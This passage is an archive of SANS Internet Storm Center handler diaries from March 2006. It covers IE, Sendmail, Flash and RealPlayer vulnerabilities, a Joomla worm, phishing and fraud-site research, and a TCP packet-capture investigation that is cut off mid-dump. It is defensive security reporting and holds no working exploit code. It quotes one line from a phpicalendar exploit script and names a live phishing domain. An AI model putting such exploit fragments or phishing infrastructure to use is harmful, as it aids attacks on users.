Published: 2006-03-24

InfoCon Returning to Green

We have decided to return the InfoCon to green for the start of the weekend.  We feel that everyone that is going to has reacted to the latest exploit for IE and wanted to start the weekend in normal mode. 

We do want to remind everyone however that this is a serious problem.  We have received information that at least a dozen sites exist out there that are working the exploits.  The information is also circulating on IRC so might be a good idea to kill IRC until the patches are released and in place.  (And no we are not going to tell anyone what the sites are. We cannot and will not release the information so please don't ask.)

Best advise we can give is to disable active scripting to make sure that your computer doesn't get smacked.  And Snort Sig's are available as was indicated earlier.

So use due diligence this weekend and take care to surf safely. Have a great weekend everyone and stay safe.


Published: 2006-03-24

Is anyone seeing an increase in port 143 (IMAP) scans?

Just curious if anyone is seeing  an increase in port scanning on Port 143? Port 143 is typically used for IMAP.  Please let us know if any of you are seeing an increase in port scan activity.


Published: 2006-03-24

IE exploit on the loose, going to yellow

Update: We just received a report that a particular site uses the "createTextRange" vulnerability to install a spybot variant. It is a minor site with insignificant visitor numbers according to Netcraft's "Site rank".

Folks, as Lorna predicted yesterday, it didn't take long for the exploits to appear for that IE vulnerability.  One has been making the rounds that pops the calculator up (no, I'm not going to point you to the PoC code, it is easy enough to find if you read any of the standard mailing lists), but it is a relatively trivial mod to turn that into something more destructive (in fact one of our readers, Matt Davis, has provided us with a version that he created that is more destructive).  For that reason, we're raising Infocon to yellow for the next 24 hours. 


Microsoft has posted this and suggests that turning off Active Scripting will prevent this exploit from working.  You could, of course, always use another browser like Firefox or Opera, but remember that IE is so closely tied to other parts of the OS, that you may be running it in places where you don't realize you are.

One of our readers asked whether DropMyRights from Microsoft would provide any protection.  We haven't had an opportunity to test that out.

I understand a snort signature to detect the exploit has been checked in to bleeding-snort, I'll update the story with a URL for the sig as soon as I find it.


Original Secunia bulletin: http://secunia.com/advisories/18680/
Microsoft blog: http://blogs.technet.com/msrc/archive/2006/03/22/422849.aspx

Jim Clausing, jclausing --at-- isc.sans.org


Published: 2006-03-23

Microsoft Security Advisory (917077)

Microsoft has just released a Security Advisory for the HTML Objects vulnerability. This is the reason the Internet Storm Center went to yellow this evening.

From the Microsoft advisory:

"Microsoft has confirmed new public reports of a vulnerability in Microsoft Internet Explorer. Based on our investigation, this vulnerability could allow an attacker to execute arbitrary code on the user's system in the security context of the logged-on user. We have seen examples of proof of concept code but we are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time."

Microsoft Suggested Workarounds:

* Configure Internet Explorer to prompt before running Active Scripting or disable Active Scripting in the Internet  and Local intranet security zones.
* Set Internet and Local intranet security zone settings to "high" to prompt before Active Scripting in these zones.


Microsoft says that they are still investigating and will provide more information as it becomes available.  So stay tuned for further updates.


Published: 2006-03-23

RealPlayer (et al) vulnerabilities & Joomla/Mambo Worm

There are three vulnerabilities in RealPlayer and associated products that allow from remote code execution and patches have been released to remediate the problems.  The vulnerabilities are with boundary errors caused by certain SWF, MBC or specially crafted webpages that can lead to buffer overflows.  The latest version of RealPlayer is not affected and users should upgrade immediately.  The advisory can be read here with iDefense's original report being here. The matrix of vulnerable products can be seen here.  While exploiting these bugs would still require some social engineering to get people to look at a malicious file, it is still recommended users run the latest version because we all know how popular watching clips on the web is (I like the VW "unpimp my ride" commericals, personally).

A reader wrote in reporting a worm spreading through the latest Mambo/Joomla exploits and establishing an IRC connection.  When I looked it appeared the botnet was already down but it is trivial to modify the shellbot code and regenerate the botnet.  Joomla 1.0.8 was released Feb 26th and had 37 (wow) security fixes, so if you aren't running 1.0.8, you have been warned.  It doesn't appear that any new vulnerabilities have been discovered since the release.

John Bambenek
bambenek -at- gmail -dot- com


Published: 2006-03-22

Sendmail vuln

Sendmail has released an advisory related to a vulnerability in
all versions of sendmail 8 previous to 8.13.6 of this popular MTA.
The advisory includes the commercial versions of products using sendmail.

and it has CVE entry CVE-2006-0058

Impact: the attacker could run arbitrary commands.

Mitigation: upgrade to 8.13.6, apply the patch, or setting the RunAsUser option in the configuration file.
This one looks bad.

Update: as more information becomes available this is starting too look worse.
Patch or upgrade NOW!



Published: 2006-03-22

New IE Vulnerability

There is a new exploit for Internet Explorer that was released by Secunia today.  The exploit allows for arbitrary code execution.  From the Secunia advisory

"The vulnerability is caused due to an error in the processing of the "createTextRange()" method call applied on a radio button control. This can be exploited by e.g. a malicious web site to corrupt memory in a way, which allows the program flow to be redirected to the heap."

In simpler terms, its a heap overflow just waiting to happen.  I doubt will have to wait long for exploit code to be published.  There are no security workarounds at this time. We will keep you posted if we find out any additional information.


Published: 2006-03-22

Veritas pulls (some) patches for Backup Exec

Symantec yesterday released two new security advisories about vulnerabilities in Veritas Backup Exec.

The first vulnerability, described in SYM06-004 allows a malicious user crashing of the Backup Exec Remote Agent by sending a specially malformed packet.
This leads to a DoS attack on the service, but considering that this is typically used for backups of critical data, the severity could be pretty high (it's easy to imagine a scenario when you need business critical data that was supposed to be backed up yesterday, but it wasn't due to the Backup Exec crashing).
In normal circumstances we would say to update as soon as possible, but it looks like there are some issues with some of the patches (we got a submission from one of our readers, thanks Charles). Symantec also pulled patches for Backup Exec 10d (10.1) and 10.0 for Windows Servers - the original advisory available at http://seer.support.veritas.com/docs/282255.htm says that the hotfix has temporarily been removed and will be re-released later.

The other advisory (SYM06-005) is related to a low risk vulnerability in the Job Engine service. This vulnerability can be exploited only in certain circumstances ("full details" logging has to be enabled, and a user has to host a specially formatted file on their system). Details about this vulnerability can be found at http://seer.support.veritas.com/docs/282254.htm.


Published: 2006-03-21

php icalendar vulnerability


George from TenableSecurity wrote two nessus plugins that checks for the vulnerabilities:


Both are available currently for those with direct plugin feeds and will become available in 3 days for those with registered feeds.

According to the exploit for one of the vulnerabilities, it will only work if  phpicalendar_publishing is set to 1 in config.inc.php, so, for now if you have this parameter set to 0, you may be safe.
echo "this works if \"phpicalendar_publishing\" is set to 1 in config.inc.php\r\n\r\n";

I didnt verify this yet, so you can expect another update on this...
Yes, another vulnerability on another php application that can lead to another php worm style...
This time the affected application is the php icalendar, according to a security advisory at Frsirt , and even worst, there are already two exploits available for it, and, no vendor patch yet...
My personal recommendation, if you use Php icalendar or any other app is to keep it current, and in this particular case, if possible, remove it until a patch/new version is available...

Handler on Duty: Pedro Bueno ( pbueno //&&//  isc. sans. org )


Published: 2006-03-21

Malware Analysis Quiz 6 results

For those following my Malware Analysis Quizes, I just posted the results of the part 6! Even if you didnt send your answers, I recommend to read some of the results there! There are quite good ones!
I will probably post a new one in the begin of april! Thanks for all of those that put some efforts on the analysis!
Handler on Duty: Pedro Bueno ( pbueno //&&// isc. sans. org)


Published: 2006-03-20

Malware sample submissions to Microsoft

I wish I could remember the original source, but I was reminded again today that Microsoft is accepting malware samples via two distinct email aliases.  (Since writing this Silverstr's blog at http://silverstr.ufies.org/blog/ was pointed out to me)

If you encounter some nastiness that you'd like to see Microsoft include in their monthly MRT updates send email to the following Microsoft email addresses depending on sample type, *Correction* and please use the AV industry standard password for malware samples of 'infected' to protect a zip or rar file containing your submitted sample.

avsubmit@submit.microsoft.com    with Virus/Worm/Trojan/Bot samples.
windefend@submit.microsoft.com  with Spyware samples.

William Salusky
Handler on duty ;)


Published: 2006-03-20

Personal Disaster Recovery

As an Internet Storm Center volunteer incident handler it is reasonable to think that each of us handlers are capable of managing and disseminating information regarding potentially widespread issues, even those that might involve varying scales of network outages.  Additionally, we as security professionals (and I'm assuming that *we are* security professionals) many of us very likely have some direct involvement in business resumption and/or disaster recovery procedures.  You may even have been involved in the creation of such documents.

I however, have suffered a personal failure in light of any of my past achievements involving disaster recovery planning.  On Sunday March 19th at approximately 1pm EST, I *myself* while turning over topsoil in the backyard somehow managed to cut my TV/cable line.  I realized this only hours later when after finishing my yard work attempted to check out CNN (*cartoons*), and was met by visual snow and white noise.  I quickly came to grips with the fact that I had cut my cable line, but was followed momentarily by the horror of realizing that my broadband was dead as well!  Mr. Connectivity (*me*), was also on tap to start a handler shift a short while later at 7pm EST. *I DID try to find both ends of the cable, but could find only one*

It gets better.  Standard practice for handlers that are unable to start a shift on time have agreed to make group notification so that someone who is available could possibly stand in and help out.  Guess what.  All of my handler documentation was either online or on a remote machine including contact numbers, email addresses, etc...  Yes, I did feel like an idiot at this point, and I still do.  On top of it all, my growing dependance on broadband has made me grow stupid enough to get rid of all modems from my hardware closet so I no longer had the option to go dial-up at this point.  I'll tell you what, it get's complicated to find the trouble reporting contact number for your cable provider when your first instinct is to hit their website. Doh!  Not wanting to start racking up 411/Information service charges using my cell phone, I called a trusted friend to do some browsing for me to get me some of the phone numbers I needed.  Yes, It's hard to believe but I do in fact have friends.

I'm making this a point of action for myself to build my own hard copy package of detail that will cover all aspects of my personal life to include not only my security geek-life, but my financial (banking/bills), medical and any other important facet that I cannot immediately think of while typing this.
If you *reader* to some degree, potentially catastrophic or otherwise, lost access to your computer(s), data, broadband, phone line, cell service, important documents would you be able to quickly get along in your daily life?  Take a moment to consider how personally vulnerable you or your business is to issues of connectivity, and put together your own package of critical information that will prevent you from stumbling from some unforeseen or stupid accident (or both).  I'll see about publishing more detail regarding recommended personal information that would be wise to maintain physically on hand.

My broadband is still down. :(

William 'Connectivity' Salusky
Handler on duty (heh heh)


Published: 2006-03-19

Storm Season

I was watching the news today and saw that northeastern Australia is being hit hard by a tropical cyclone that is as strong as hurricane Katrina was last year.  Our thoughts and prayers go out to those in the affected area and we hope that the losses and damage are low.  If anybody in the affected area has any lessons to share or if you need any assistance please drop us a note via the contact page above.

Watching the videos of the storm reminded me of how well our readers responded to two requests we had last year in the wake of Katrina.  One was for volunteers to assist with recovery and the other was for assistance with locating and disabling fraudulent web sites and domains designed to take advantage of the Katrina disaster.  I suspect that this year's hurricane season will be no different than last year's so take time now to do proper business continuity planning particularly if you are in areas affected by tropical storms.  Also, if you are able, contact your local chapter of the Red Cross now and sign up for volunteer training.  Regardless of the country you may be in, your local Red Cross or Red Crescent chapter can use volunteers with computer and networking experience.  It's too late to receive training after an emergency happens, so do the training now and be ready to assist when needed in the future.

One more thought - the next "big event" that could happen on a global scale is the avian flu ("bird flu") that every news channel seems to be talking about.  I did a quick search of some potential domain names that contain "avian flu" plus variations and am appalled at what is already registered.  It looks like the scammers and fraudsters are already preparing to take advantage of the Internet community, knowing that many will work from home and will be using the Internet to communicate with family, friends, and co-workers.  We may have to do the same thing we did last year with Katrina and start an effort to identify and disable fraudlent sites and domains, but if you work for an ISP that hosts web sites could you keep an eye out for us and enforce those acceptable use agreements?  It sure would be nice to be able to get in front of this next wave of fraud rather than fight it after it gets started.


Published: 2006-03-19

Five Years of Storming

In March of 2001, the Lion worm set in motion a series of events that resulted in the creation of the SANS Internet Storm Center.  That was five years ago in an era when script kiddies were defacing web sites and launching endless DDoS attacks against each other.  Worms were a pretty big deal, and bots were just getting started.  Credit card theft was already happening, but "identity theft" had not become the big buzzword that it is today.  That was also pre-September 11th and we had no idea what was in store for the planet later that year. 

So on this anniversary of the Storm Center, I'd like to thank all of our volunteer incident handlers from over the years for their many hours of dedicated time, as well as extend a note of appreciation to the thousands of DShield sensor operators, the people who read our daily diaries, and those who participate in the various discussion forums.  I'd like to also thank Johannes Ullrich for his tireless efforts to keep the electrons flowing behind the scenes, and the SANS Institute for paying the bills.

Since we all like to have contests, here's one that should be fun to do.  Look back through your old email to the period around March or April of 2001 and see if you can find any notes that reference the SANS Internet Storm Center.  If you can, forward them to us via the contact page above and we'll figure out who has the earliest one.  We'll mention your name in a future diary if you want us to, or you can remain anonymous.

Happy hunting, and Happy Birthday Internet Storm Center!

Marcus H. Sachs
Director, SANS ISC


Published: 2006-03-19

Potential phpBB Hack Coming?

Two readers (thanks, Ricardo and Ken) pointed us to a story on digg that appeared this morning.  The story links to a posting on a German board about a potential phpBB hack attack coming in the next few weeks:


"During the last few days a bot using a name FuntKlakow, has been registering to maybe thousands of phpBB forums. Some speculate that the bot's owners are preparing to exploit an unreported vulnerability."

We might be chasing a ghost here but it's always good to be on the lookout for something like this.


Published: 2006-03-18

Research on a Fraudulent site

A reader submitted to us his research on a spam email which contains a company called Bellford Trade & Investment (BTI) and its website (bellfordtrade.com). After some careful research, he concluded the company and website is fraudulent. Below is his findings that you may find it interesting and useful.

Below is the evidence that I use to support this:

1.  The domain (bellfordtrade.com) was registered very recently, and was only registered for 1 year:

Creation Date........ 2006-02-03
Registration Date.... 2006-02-03
Expiry Date.......... 2007-02-03

This is common for sites that are used for fraudulent purposes. Register the site, get the fraud up and running, and it will probably be shutdown soon thereafter. So, why pay for more than 1 year of registration?  It's a throwaway domain.

2.  The contact information for the domain is hidden behind "myprivateregistration.com", which is a service of Melbourne IT in Australia, dba Internet Names Worldwide. Although this can be used by legitimate websites, it is fraught with fraud.

Admin Name........... PrivateRegContact Admin
Admin Address........ P O Box 99800
Admin Address........
Admin Address........ EmeryVille
Admin Address........ 94662
Admin Address........ CA
Admin Address........ US
Admin Email.......... contact@myprivateregistration.com
Admin Phone.......... +1.5105952002

This PO box apparently belongs to a US office of Melbourne IT. This PO box and the whole My Private Registration service seems to be used by lots of fraudulent websites (spammers, phishers, etc.), although it is probably used by legitimate sites as well. Just doing some Google searches on this information pulls up all sorts of shady things.

3.  A google search of "Bellford Trade & Investment" hits on a craiglist ad (an unusual place for a legitimate trading company to advertise) and a Yahoo Local business listing in New York City. The phone number on this listing is no good. This listing claims "Member SIPC (1205-9847)". I checked the SIPC website, and they don't list BTI as a member. This listing also points to the bellfordtrade.com website (the same one that was in the Spam). The Spam also said that they are an SIPC member, which they aren't.

4.  The bellfordtrade.com website itself is suspicious (WARNING: I wouldn't visit this website with a PC you care about, since it might also be distributing malware/spyware/whatever -- I don't know if it is or not, but I'm paranoid about such things, so I used a throwaway VMWare session to view it.) First of all, the "Contact Us" page doesn't work, and I can't find any other contact information for BTI on their website (besides their e-mail address). Not good.

5.  On the "join" page on the website, which is where one would sign up for their service, they have an unsecured web form (it's not using SSL).

6.  On the "join" page, they have the "BBB Online Reliability" program seal. However, the seal doesn't have the required link to their membership entry on the BBB Online site. Also, a search of the BBB Online website shows that BTI is not a member. So this is a fraudulent claim.

7.  On the "join" page, they have the "Protected by Thawte" logo. However, the logo doesn't have the required link back to Thawte, and the form isn't even SSL protected (Thawte issues SSL certificates). So this is also a fraudulent claim.

8.  The whole website feels "icky" to me. It's using lots of Flash, the content seems questionable, and it just seems like a bunch of lies.

9.  BTI is not listed in Dunn and Bradstreet's business directory. Not all businesses are listed here, certainly, but I'd expect a legitimate financial trading company to be listed here.

10.  BTI sent Spam, and claimed an affiliation with XXXXX. These are both shady practices, and it's unlikely that a legitimate financial company would do this.

11.  The Spam claimed that they were an NASD member. I can't find them listed in the NASD directory, so this is also a fraudulent claim.

12.  The toll-free numbers listed in the Spam are no good.



Published: 2006-03-18

Symantec update blocks access to AOL

A reader has reported to us that he is unable to access AOL and wondered why AOL blames on Symantec after calling up AOL. If you are not able to connect to AOL after running Symantec LiveUpdate, it could be caused by one of Symantec intrusion detection signature that was included in the March 15 LiveUpdate.

Apparently, the update incorrectly detected part of the AOL connection as a potential risk and resulted in blocking access to AOL servers. Symantec has corrected the problem with a new update. If you have this problem, you may want to check out the details at Symantec website.

Thanks to Johannes for checking this out.


Published: 2006-03-17

New IE 0-Day Exploit in Wild

There is a new and unpatched vulnerability with exploit code in the wild that affects the latest version of IE.  The exploit works by including an abnormally large (a couple thousand) number of script actions inside a single HTML tag.  This will cause a memory array to write out of bounds and cause an immediate or eventual browser crash.  Both McAfee and Symantec have released signatures to detect this exploit.  While this is only a DoS vulnerability at the moment, there is ongoing attempts to try to use this as a vector for remote code execution.

More as it develops...


Published: 2006-03-17

Identity Theft: Accounts Stolen vs Accounts Used - Reader Input

It seems to be the general consensus that very few of the accounts stolen from online scams, keyloggers, and phishing actually ever get used.  By comparing the FTC's data (about 180,000 cases of identity fraud from possible online vectors) with my last year's estimate of how many accounts have been compromised you get about 2% of accounts that have been compromised actually get defrauded (so far).  Assuming I'm full of crap (an assertion I wouldn't dispute) and my estimate was ten-fold higher than reality (an assertion I would dispute), that still means 20% of accounts compromised get used.  Credit card information has a street value, and one estimate I heard was that you get $50 USD per good account.

Two questions for readers:
Do you agree that most of the accounts stolen online never get used?
Why do you think that is?

I'll post a montage of responses later in the day and include my thoughts.


Published: 2006-03-17

Apple Updates the Update

Today, Apple release Version 1.1 of its 2006-002 patch which was released on Monday.
Read more about it here: Apple 2006-002 v1.1

This time, Apple only lists the patched components (php, CoreTypes, LaunchServices, Mail, rsync, Safari).
The update includes all the fixes released in the initial Apple 2006-002 an -001 patch.

Based on the included compents, I believe that this patch will address some of the missed issues in open source packages (rsync and php) which I elluded to in Tuesday's webcast. In addition, the patch will likely fix more issues related to the "safe file execution" problem.

We may update this diary later in case Apple releases any details. A couple words about mitigation:

  • rsync: by default rsync does not run as a server on OS X, so you should be ok with respect to simple remote exploits. Recent rsync vulnerabilities required the user to be logged in.
  • php: only an issue if you have Apache with php default enabled. By default, apache is not enabled, and Apple does not load php in its default httpd.conf. Recent vulnerabilities in php, which are likely addressed in this update, protect against local users overstepping restrictions provided by php safe_mode. This is likely a "must apply" patch if you provide shared web hosting with php support. Of course, validating the patch is in particular tricky in such an environment.
  • "Safe file execution": You should keep this option disabled in Safari. Keeping a wrapper around 'terminal' or protecting terminal from execution by untrusted users via the parental controls is another appropriate workarround if it does not restrict your users too much.
Would be nice to have a few more details from Apple. For home users: Apply the patch as soon as you can. At this point, Apple does not appear to offer the patches in distinct packages, which will make testing in larger environments tricky.

Some Apple users report in this forum about experiencing network issues after applying 2006-002, which disapeard after applying 2006-002v1.1. See other threads in the same forum for reports of issues like system crashes and systems no longer booting correctly. Apple has not confirmed any problems with this update so far.


Published: 2006-03-17

Guide to Finding Safe Online Merchants

After writing the safer online shopping guide several readers asked for guidance in how to pick a trusted vendor.  Well, I just wrote a guide for that as well which you can read here.  Essentially it comes down to this (and not all need to be met):

1) Use well-known merchants
2) Use merchants with physical addresses
3) Use merchants with registered businesses
4) Use merchants you have a personal relationship with
5) Use merchants with good reputations

If you don't trust the merchant, use a third-party payment system such as PayPal where no account information is exchanged.  Of course, this won't prevent problems but it will help consumers avoid malicious versus negligent or unlucky businesses.  For good reading on how identity theft is being made easier, take a look at Brian Krebs' excellent article and blog post on the subject.


Published: 2006-03-16

Phishing Messages May Include Highly-Personalized Information

Phishing messages are becoming increasingly personalized in attempts to convince the recipients to trust originators of the messages. A phishing email recently submitted to us illustrates this trend. In this case, the message that arrived in the victim's inbox included the person's full name and postal address:

The message masqueraded as a CitiBusiness alert. The "click here" link led to a fraudulent website hosted at citibusinessonline.da.us.citibank.com.citionline.ru. The whois record for citionline.ru indicated that the Russian domain was registered a few days prior to the attack.

Where does the personal data come from? In this incident, this victim rarely used his/her full name online, and the name was not included in phone directories. It is possible that the scammer obtained the data from diverse sources and was able to link the fields (name, email address, and postal address) together. More likely, the data originated from a website that stored billing details or from a compromised credit card processor. Yet another possibility is that the scammer purchased the data from legitimate consumer data providers. Even if the scammer was not certain that the victim's records were correct, even a small number of matches would increase the number of fooled victims.

If you were wondering what awaited the victim at the website set up for the phishing attack, wonder no more:

Mimicking the real CitiBusiness Online website, the phishing site allowed the victim to enter his/her Business Code by clicking on images of numbers in the form. The URL that brought the person to the fraudulent site included a unique identifier that allowed the site to track email recipients. It is possible that the identifier was used to pull up the victim's records from the fraudulent site's database; another possibility is that the victim's name and address were actually encoded in the URL string. As a result, two screens later, the victim was presented with his/her postal address and full name without having to supply them to the site:

After allowing the victim to correct the address, the site prompted the person for additional sensitive information, such as date of birth, social security number, and mother's maiden name:

We reported this phishing attempt to Anti-Phishing Working Group and Citibank. If you have witnessed highly-personalized phishing scams of this nature as well, please send us the details.

This note incorporates comments from several ISC handlers. I am very grateful for their contributions.

Lenny Zeltser
ISC Handler


Published: 2006-03-15

Large Child porn Arrest and how to report it.

Major news media reported today about a large child port sting operation, which resulted in 27 arrests in several countries. In this context, if you find / observe such activity, please report it in the US to the National Center for Missing and Exploited Children. Please DO NOT send us any samples or links, but report it to the National Center's Cyber Tipline (see link on their home page).

The National Center for Missing and Exploited Children is tasked by the US government to coordinate the response in such cases and will forward reports to the appropriate law enforcement entities. Let us know if you know about similar entities in other countries and I will add respective links.

Links for other countries:
Belgium: http://www.gpj.be/uk/index.html
Germany: your local "LKA" (Landes Kriminal Amt). For a list, see the list of addresses.
for other countries, check www.childfocus.org


Published: 2006-03-15

Request for Data

I am currently working on some research and would like to put out a request for data.  What I need is that given a list of signatures relating to keyloggers and associated malware, the number of unique IPs in an environment that has triggered them (with some additional info).  When I publish my findings, I will not identify organizations or the data, but report in the aggregate with all the participants I get (I won't say, for instance, Acme Inc has X infection rate, I'm interested in establishing a general trend).  For this, I'm looking for environments in the United States only (no offense to non-US readers, but it's US trending only). If you are interested in helping me or have additional questions, please contact me at bambenek -at- gmail -dot- com.


Published: 2006-03-15

Unspecified Vulnerabilities in Flash

A number of readers have written in to warn us about a recent notification from Adobe/Macromedia regarding an unspecified number of vulnerabilities of some nature within pretty much every Flash execution engine you've heard of on all the platforms that support Flash; eg Windows and Macintosh running:

Macromedia Breeze 4.x
Macromedia Breeze 5.x
Macromedia Breeze Meeting Add-In
Macromedia Flash 8.x
Macromedia Flash MX 2004
Macromedia Flash MX Professional 2004
Macromedia Flash Player 7.x
Macromedia Flash Player 8.x
Macromedia Flex 1.x
Shockwave Player 10.x

There are several other sources of "information" about this issue:
Secunia's WriteupMicrosoft's Writeup, and Macromedia's Writeup. 

So, we know that it appears as if the arbitrary code you're running inside a flash file has the potential to escape the flash engine and obtain access to the host system.  We know that updated versions of flash are available.
Microsoft's writeup also contains instructions on disabling the flash ActiveX control from executing.   Firefox users could probably get away with using AdBlock to prevent "*.swf" files, although it's not necessary that
the malware end in ".swf".

We don't know much else. We don't know how it works. We don't know who's seen it, if anyone has.


Published: 2006-03-14

March Microsoft Security Bulletins Released

As covered in the pre-announcement, Microsoft released two bulletins today:

MS06-012: Critical Vulnerability in Microsoft Office, KB905413

This update fixes a number of different Excel vulnerabilities, and a "Malformed Routing Slip" vulnerability which affects muliple Office components.

All the vulnerabilities come down to the same issue: If you open a malformed file, an attacker could get control of the system as the user opening the file.

If you use Microsoft Office, you should apply this patch quickly.

UPDATE: 2006-03-15: PoC exploits have been released.  The patch window is closing rapidly.

MS06-011: Priviledge Escalation in Windows (Important)

It may be possible for a regular user to obtain the privileges assigned to a service. A lower privileged user could change the configuration for a service in order to have it execute code or modify the system in other ways, once the service is running at the higher privilege (e.g. 'system').

This vulnerability has been disclosed for a while now. It is important to note that a "service" is not just a "server". Services typically have to run at a higher privilege level as they require access to files across multiple users, and access to system resources.


Published: 2006-03-14

McAfee DAT 4715 clean up tool available

In one of the updates to Pat's story on Sunday, I mentioned that we had heard McAfee would make its tool to restore files that had been incorrectly quarantined by the bad DAT publically available at some point.  Well, one of our readers, Mark, has pointed out to us, that the tool is now available (thanx, Mark).  Follow the link in the 13 Mar update at http://vil.nai.com/vil/content/v_138884.htm.


Published: 2006-03-13

Apple Mac OS X security patch bundle 2006-002

Apple released some more security patches today for Mac OS X in a bundle called 2006-002.
Fix for an XSS scripting vulnerability in archives by flagging the documents as unsafe.
Fix for a vulnerability allowing arbitrary code execution by clicking on crafted email messages
Additional checks on top of those in the previous update.
  • Various non security rated regression fixes in a.o.  apache_mod_php (still based on PHP 4.4.1, not on the latest 4.4.2) and rsync.
It's interesting to note that rsync reports it's version after patching as:
$ rsync --version
rsync  version 2.5.5  protocol version 26
Copyright (C) 1996-2002 by Andrew Tridgell and others
Capabilities: 64-bit files, socketpairs, hard links, symlinks, batchfiles,
no IPv6, 32-bit system inums, 64-bit internal inums

rsync comes with ABSOLUTELY NO WARRANTY. This is free software, and you
are welcome to redistribute it under certain conditions. See the GNU
General Public Licence for details.
While a quick visit to http://rsync.samba.org/ shows there have been quite a few versions and fixed vulnerabilities in the mean time.

Swa Frantzen - Section 66


Published: 2006-03-13

A TCP/IP mystery (solved)

For a little bit of background, the problem described below actually began for a previous client about a year ago, but it wasn't until Friday that I was actually able to get enough data to figure out what the problem really was, so bear with me as I walk you through the tale.

In the beginning

The client I was working for is a multinational Fortune 500 company headquartered in the US.  About a year ago, we started getting complaints that some individuals in one of the lines of business was no longer able to exchange e-mail with a supplier.  We got the parties involved and a conference call to troubleshoot, but the supplier's networking folks weren't all that knowledgeable.  Our conclusion was that their responses (the SYN/ACK packets) to the SYN packets from our external mail relays were not reaching our firewall.  After some fingerpointing back and forth, the supplier finally mentioned that they had recently "upgraded their firewall."  They decided to rollback to the previous version and suddenly e-mail was flowing again.  We tried to find out what had changed between versions, but were never able to find out.  Not an entirely satisfactory resolution from my point of view, but the client and their supplier were happy, so we chalked that one up to experience and moved on.  As you might expect, a few months later, they had the same problem with another business partner.  Again, rolling back to the previous version solved the problem, and again no one was able to show us what had changed so that we could try to figure out where the real problem existed.  Out of this second situation, we did learn a little bit more, namely that the firewall was actually Linux/iptables-based.  That should have made it easier, I have been using Linux and iptables for my home firewall for several years, but we still weren't able to hook up with anyone who understood the Linux well enough on the partner side to get a dump of the rules or anything.

Fast forward to last month.  The problem rears its ugly head again.  This time, the third-party is able to get us packet captures of the traffic (both working and failing) and a dump of the rules for the failure case.  Finally, we might have enough data to solve the mystery.  I should probably mention that while I've moved on to a different position in the company, I'm still in contact with my former team that is still working with this client.  After looking things over for a while they were still confused, so they gave me a call on Friday.

Now maybe we're getting somewhere

I decided to sit down and see if I could tell what was different between the capture when the traffic succeeded (all the firewall rules were turned off, the firewall was essentially acting as a router) and the case where the traffic was failing.  So I sat down and looked at the 2 captures.  Now, I'd like to say that I was 'man enough' to figure it out just by looking at it with tcpdump -x, but I didn't even try, I went to ethereal almost immediately because I didn't have Stevens handy at the time (I was working from home and the book was on my shelf at the office).

First, the traffic when the communication succeeded.

jac@leibnitz[513]$ tcpdump -r nofw.pcap -c4
reading from file nofw.pcap, link-type EN10MB (Ethernet)
19:15:24.492173 IP client.com.28680 > partner.com.smtp: S 604326096:604326096(0) win 65535 <mss 1460,nop,nop,sackOK>
19:15:24.492242 IP partner.com.smtp > client.com.28680: S 150399351:150399351(0) ack 604326097 win 5840 <mss 1460>
19:15:24.541465 IP client.com.28680 > partner.com.smtp: . ack 1 win 65535
19:15:24.550951 IP partner.com.smtp > client.com.28680: P 1:95(94) ack 1 win 5840

And when it failed

jac@leibnitz[514]$ tcpdump -r failed.pcap -c4
reading from file failed.pcap, link-type EN10MB (Ethernet)
19:08:51.231906 IP client.com.21644 > partner.com.smtp: S 2389181400:2389181400(0) win 65535 <mss 1460,nop,nop,sackOK>
19:08:51.231978 IP partner.com.smtp > client.com.21644: S 4040255024:4040255024(0) ack 2389181401 win 5840 <mss 1460>
19:08:54.391432 IP client.com.21644 > partner.com.smtp: S 2389181400:2389181400(0) win 65535 <mss 1460,nop,nop,sackOK>
19:08:54.391638 IP partner.com.smtp > client.com.21644: S 4040255024:4040255024(0) ack 2389181401 win 5840 <mss 1460>

Okay, so the partner server is sending the SYN/ACK back, but by sniffing on the firewall at the client end, it wasn't making it all the way back, so it was getting dropped somewhere upstream of the firewall.  So I decided to look at the SYN/ACK packets from the 2 captures a little more closely with ethereal (or actually tethereal) and since I'm suspecting a router is dropping this someplace upstream of my firewall, I'm going to concentrate on layer 3 (the IP header).  Why?  Because that should be all the further into the packet that a router should be looking.  So, first the one that works

Frame 2 (58 bytes on wire, 58 bytes captured)
    Arrival Time: Mar  8, 2006 19:15:24.492242000
    Time delta from previous packet: 0.000069000 seconds
    Time since reference or first frame: 0.000069000 seconds
    Frame Number: 2
    Packet Length: 58 bytes
    Capture Length: 58 bytes
    Protocols in frame: eth:ip:tcp
Ethernet II, Src: Intel_f3:78:c3 (00:0c:f1:f3:78:c3), Dst: Intel_a8:7d:0a (00:d0:b7:a8:7d:0a)
    Destination: Intel_a8:7d:0a (00:d0:b7:a8:7d:0a)
    Source: Intel_f3:78:c3 (00:0c:f1:f3:78:c3)
    Type: IP (0x0800)
Internet Protocol, Src: aa.bb.cc.dd (aa.bb.cc.dd), Dst: ee.ff.gg.hh (ee.ff.gg.hh)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 44
    Identification: 0x0000 (0)
    Flags: 0x04 (Don't Fragment)
        0... = Reserved bit: Not set
        .1.. = Don't fragment: Set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 64
    Protocol: TCP (0x06)
    Header checksum: 0x0a19 [correct]
        Good: True
        Bad : False
    Source: aa.bb.cc.dd (aa.bb.cc.dd)
    Destination: ee.ff.gg.hh (ee.ff.gg.hh)

And then the one that doesn't

Frame 2 (58 bytes on wire, 58 bytes captured)
    Arrival Time: Mar  8, 2006 19:08:51.231978000
    Time delta from previous packet: 0.000072000 seconds
    Time since reference or first frame: 0.000072000 seconds
    Frame Number: 2
    Packet Length: 58 bytes
    Capture Length: 58 bytes
    Protocols in frame: eth:ip:tcp
Ethernet II, Src: Intel_f3:78:c3 (00:0c:f1:f3:78:c3), Dst: Intel_a8:7d:0a (00:d0:b7:a8:7d:0a)
    Destination: Intel_a8:7d:0a (00:d0:b7:a8:7d:0a)
    Source: Intel_f3:78:c3 (00:0c:f1:f3:78:c3)
    Type: IP (0x0800)
Internet Protocol, Src: aa.bb.cc.dd (aa.bb.cc.dd), Dst: ee.ff.gg.hh (ee.ff.gg.hh)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x04 (DSCP 0x01: Unknown DSCP; ECN: 0x00)
        0000 01.. = Differentiated Services Codepoint: Unknown (0x01)
        .... ..0. = ECN-Capable Transport (ECT): 0
